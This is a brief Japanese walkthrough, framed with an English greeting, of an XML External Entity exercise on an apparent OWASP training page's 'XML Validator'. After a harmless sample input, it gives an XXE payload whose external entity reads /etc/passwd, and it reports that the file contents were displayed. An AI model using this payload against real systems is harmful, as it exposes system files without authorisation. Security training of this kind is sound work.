Hello there,
OWASP 2017 ⇨ A4 ⇨ XML External Entity Injection ⇨ XML Validatorを選択して。
このページは、XMLをうけつけるようで。
下記のサンプルを入力してみると。
<somexml><message>Hello World</message></somexml>
ちなみにXMLのリクエストヘッダーは以下のような感じ。
そして、下記のようにエンティティを実行すると。
ファイルの中身が表示できた。
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT bar ANY>
<!ENTITY file SYSTEM "/etc/passwd">
]>
<bar>&file;</bar>
Best regards,